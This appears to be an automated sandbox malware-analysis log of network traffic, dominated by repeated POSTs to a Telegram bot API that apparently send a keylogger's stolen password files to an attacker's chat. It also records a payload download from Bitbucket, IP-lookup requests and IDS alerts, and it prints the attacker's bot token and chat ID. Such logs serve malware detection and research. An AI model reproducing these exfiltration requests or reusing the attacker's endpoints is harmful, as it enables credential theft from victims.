            Source: global trafficHTTP traffic detected: POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd0f08a8cc2626Host: api.telegram.orgContent-Length: 537
            Source: global trafficHTTP traffic detected: POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd0ef55334ac8aHost: api.telegram.orgContent-Length: 537
            Source: global trafficHTTP traffic detected: POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd0f7f6e69a05fHost: api.telegram.orgContent-Length: 537
            Source: global trafficHTTP traffic detected: POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd0f1ddc04ff5aHost: api.telegram.orgContent-Length: 537
            Source: global trafficHTTP traffic detected: POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd0f982ba92d5dHost: api.telegram.orgContent-Length: 537
            Source: global trafficHTTP traffic detected: POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd0f0c03271772Host: api.telegram.orgContent-Length: 537Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd0f1e9f0c802fHost: api.telegram.orgContent-Length: 537
            Source: global trafficHTTP traffic detected: POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd0fab9e050937Host: api.telegram.orgContent-Length: 537
            Source: global trafficHTTP traffic detected: POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd0f2f0420657eHost: api.telegram.orgContent-Length: 537
            Source: global trafficHTTP traffic detected: POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd0f35250cf7bbHost: api.telegram.orgContent-Length: 537Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd0fc80cbc88b2Host: api.telegram.orgContent-Length: 537
            Source: global trafficHTTP traffic detected: POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd0f440fe0220dHost: api.telegram.orgContent-Length: 537
            Source: global trafficHTTP traffic detected: POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd0f4ce99ede20Host: api.telegram.orgContent-Length: 537
            Source: global trafficHTTP traffic detected: POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd0f5908777d5bHost: api.telegram.orgContent-Length: 537
            Source: global trafficHTTP traffic detected: POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd0fe461bde220Host: api.telegram.orgContent-Length: 537
            Source: global trafficHTTP traffic detected: POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd0f63476ff6d9Host: api.telegram.orgContent-Length: 537Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd0f6f3c5dd29eHost: api.telegram.orgContent-Length: 537
            Source: global trafficHTTP traffic detected: POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd10047244b21aHost: api.telegram.orgContent-Length: 537
            Source: global trafficHTTP traffic detected: POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd0f76f31b176fHost: api.telegram.orgContent-Length: 537
            Source: global trafficHTTP traffic detected: POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd0f82c2b37b8eHost: api.telegram.orgContent-Length: 537
            Source: global trafficHTTP traffic detected: POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd101cbc07fa5fHost: api.telegram.orgContent-Length: 537
            Source: global trafficHTTP traffic detected: POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd0f8fc54b4863Host: api.telegram.orgContent-Length: 537Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd0f9b66364c74Host: api.telegram.orgContent-Length: 537
            Source: global trafficHTTP traffic detected: POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd1044355765bfHost: api.telegram.orgContent-Length: 537
            Source: global trafficHTTP traffic detected: POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd0fac6961b0abHost: api.telegram.orgContent-Length: 537
            Source: global trafficHTTP traffic detected: POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd0fb53f2b9fbbHost: api.telegram.orgContent-Length: 537
            Source: global trafficHTTP traffic detected: POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd106900031a3dHost: api.telegram.orgContent-Length: 537
            Source: global trafficHTTP traffic detected: POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd0fc7a70b6000Host: api.telegram.orgContent-Length: 537Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd0fd2dd57c60fHost: api.telegram.orgContent-Length: 537
            Source: global trafficHTTP traffic detected: POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd10968007cad7Host: api.telegram.orgContent-Length: 537
            Source: global trafficHTTP traffic detected: POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd0fe7f7931677Host: api.telegram.orgContent-Length: 537
            Source: global trafficHTTP traffic detected: POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd0ff1a9c0edb8Host: api.telegram.orgContent-Length: 537
            Source: global trafficHTTP traffic detected: POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd10c1527eafe5Host: api.telegram.orgContent-Length: 537
            Source: global trafficHTTP traffic detected: POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd1006e1e9399eHost: api.telegram.orgContent-Length: 537Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd1011a0457cfdHost: api.telegram.orgContent-Length: 537
            Source: global trafficHTTP traffic detected: POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd10f381542235Host: api.telegram.orgContent-Length: 537
            Source: global trafficHTTP traffic detected: POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd102ad1bb58e8Host: api.telegram.orgContent-Length: 537
            Source: global trafficHTTP traffic detected: POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd10354bf3d436Host: api.telegram.orgContent-Length: 537
            Source: global trafficHTTP traffic detected: POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd112bbdaca27cHost: api.telegram.orgContent-Length: 537
            Source: global trafficHTTP traffic detected: POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd10564b4229a8Host: api.telegram.orgContent-Length: 537Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd105de7de44b5Host: api.telegram.orgContent-Length: 537
            Source: global trafficHTTP traffic detected: POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd11703916c344Host: api.telegram.orgContent-Length: 537
            Source: global trafficHTTP traffic detected: POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd10ec2ab08cebHost: api.telegram.orgContent-Length: 537
            Source: global trafficHTTP traffic detected: POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd10f104b8c903Host: api.telegram.orgContent-Length: 537
            Source: global trafficHTTP traffic detected: POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd1275f877ff90Host: api.telegram.orgContent-Length: 537
            Source: global trafficHTTP traffic detected: POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd1121e522ff54Host: api.telegram.orgContent-Length: 537
            Source: global trafficHTTP traffic detected: POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd112726dfdaefHost: api.telegram.orgContent-Length: 537Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd12d4ee8d8cfeHost: api.telegram.orgContent-Length: 537
            Source: global trafficHTTP traffic detected: POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd114d7c71abd4Host: api.telegram.orgContent-Length: 537
            Source: global trafficHTTP traffic detected: POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd11559464c338Host: api.telegram.orgContent-Length: 537
            Source: global trafficHTTP traffic detected: POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd131d191f6227Host: api.telegram.orgContent-Length: 537
            Source: global trafficHTTP traffic detected: POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd1197e49d4113Host: api.telegram.orgContent-Length: 537
            Source: global trafficHTTP traffic detected: POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd11aa88ccb890Host: api.telegram.orgContent-Length: 537Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd13bb487a2aa3Host: api.telegram.orgContent-Length: 537
            Source: global trafficHTTP traffic detected: POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd11dc4fb6d2d1Host: api.telegram.orgContent-Length: 537
            Source: global trafficHTTP traffic detected: POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd11c811aae335Host: api.telegram.orgContent-Length: 537
            Source: global trafficHTTP traffic detected: POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd1423a1fed966Host: api.telegram.orgContent-Length: 537
            Source: global trafficHTTP traffic detected: POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd12345456dd07Host: api.telegram.orgContent-Length: 537Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd14c06965d3a2Host: api.telegram.orgContent-Length: 537
            Source: global trafficHTTP traffic detected: POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd1220a2538758Host: api.telegram.orgContent-Length: 537
            Source: global trafficHTTP traffic detected: POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd12a00e36c4c0Host: api.telegram.orgContent-Length: 537
            Source: global trafficHTTP traffic detected: POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd12a75cd9b643Host: api.telegram.orgContent-Length: 537
            Source: global trafficHTTP traffic detected: POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd155c28fa062fHost: api.telegram.orgContent-Length: 537
            Source: global trafficHTTP traffic detected: POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd0dcf78ef9f83Host: api.telegram.orgContent-Length: 537Connection: Keep-Alive
            Source: Joe Sandbox ViewIP Address: 132.226.8.169 132.226.8.169
            Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
            Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
            Source: unknownDNS query: name: checkip.dyndns.org
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49703 -> 16.182.70.225:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49702 -> 185.166.143.48:443
            Source: global trafficHTTP traffic detected: GET /ntim1478/gpmaw/downloads/240_Cobsfhiygmx HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: bitbucket.org
            Source: global trafficHTTP traffic detected: GET /e427e629-62a6-4ecd-bf22-56e4d6ea083f/downloads/d4025bf5-bb79-4526-ae33-7a2e4ade5334/240_Cobsfhiygmx?response-content-disposition=attachment%3B%20filename%3D%22240_Cobsfhiygmx%22&AWSAccessKeyId=ASIA6KOSE3BNDW6O2X3G&Signature=2chtfxoFxVQH%2B%2Bqk1LYozF4rZ%2B0%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEID%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FwEaCXVzLWVhc3QtMSJGMEQCIAD1NYAHfsojP08kbtMfuAOMGAEvCe3UKQ8UuqEcK7AUAiBLFY8fCNgsv5yXRVa1b5QNwmml9rALfaMKgd8jdopQyyqnAggoEAAaDDk4NDUyNTEwMTE0NiIMfAZ8Us6gNEO9lXe4KoQC4H3JCLPChoPHuNq8eVCV0VMfd0IICdqgHHTSS7ANzAU4dth3BBqgfGziNIRR91nsxqTwbAAkR9UbQFCz06yniB%2BRGncxwoJCSnWAnC0PMUZxzU%2B%2BmfP%2FabATRJ9BblkOl1DPLVzf%2FJK1O6swKVUCdmPXu9Jkpx0Zs3JpqA2SUfKf9kMOAbhud5%2B1kxcQ6T7uVBLz8q4gm46LDNyHkSdwPE%2FQPgP3oIs4bSwQ5TMxJgIO5MbAPud6%2Bz%2FVgFMzq8rBGnCYT%2F4UbUFOLOxmP7f%2FDVGr5XggPH5IbOKF9s2N5SU%2B%2B%2BFpTKfe55tJ6Uv%2BfHOKA0oQO%2BP7Wdzhn3fln1%2B7PoGjL2cwk%2BqVugY6ngGYCJOQQCMy7ggWig9zh2r3BmXcbjQcgkcKcTBPK9af%2FavWTGfdHkiCsWui9miH9txKAmMYOb08nXhpPgiwJXBhhGW9aVZgTRRjdb2Sv%2FPIWSb4mnaUlx07x5vLgIpzF7bcB%2BXCGAwY9Fu1PDZraBoc98lDjGKEsMeyI4ZoviGm%2Fw7CfZ%2BnLixdbdCHlHxYrlVAS%2BUU8DDCuagK%2FZVUiA%3D%3D&Expires=1732607003 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: bbuseruploads.s3.amazonaws.com
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
